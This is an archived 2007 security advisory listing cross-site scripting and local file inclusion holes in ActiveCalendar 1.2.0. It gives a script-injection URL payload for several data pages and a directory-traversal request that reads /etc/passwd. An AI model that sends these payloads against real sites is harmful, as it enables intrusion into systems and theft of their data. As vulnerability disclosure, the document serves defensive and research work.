activecal120-multi.txt

activecal120-multi.txt: Posted Feb 28, 2007; Authored by Simon Bonnard; ActiveCalendar version 1.2.0 suffers from cross site scripting and local file inclusion vulnerabilities.; tags | exploit, local, vulnerability, xss, file inclusion; SHA-256 | 513b48e4fd48b42dbb697f29d0b224b641534ba4e92774151fd71c49c5916e88; Download | Favorite | View

activecal120-multi.txt

ActiveCalendar 1.2.0, Multiple vulnerabilities
Vendor site : http://www.micronetwork.de/activecalendar/
Global risk : Critical

Multiples XSS :
---------------

/activecalendar/data/[page].php?css="><script>alert(document.cookie)</script>

In :

/data/
flatevents.php
js.php
mysqlevents.php
m_2.php
m_3.php
m_4.php
xmlevents.php
y_2.php
y_3.php


Local File Include :
---------------------

/activecalendar/data/showcode.php?page=../../../../../../../../../../../../../../etc/passwd%00


Regards,


Simon Bonnard - 24/02/07 - 02:40am

Top Authors In Last 30 Days

Red Hat 293 files
Ubuntu 64 files
Debian 22 files
Gentoo 8 files
Google Security Research 7 files
LiquidWorm 6 files
Apple 5 files
Jann Horn 3 files
Spencer McIntyre 3 files
Milad Karimi 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,175)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,140)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,480)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,022)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

activecal120-multi.txt

activecal120-multi.txt

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

activecal120-multi.txt

Share This

activecal120-multi.txt

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems